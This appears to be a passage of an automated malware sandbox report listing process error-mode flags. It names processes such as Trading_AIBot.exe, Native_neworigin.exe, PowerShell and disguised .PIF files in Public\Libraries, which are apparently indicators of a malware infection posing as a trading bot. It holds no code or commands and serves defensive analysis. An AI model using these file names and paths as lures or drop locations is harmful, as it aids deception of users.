                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
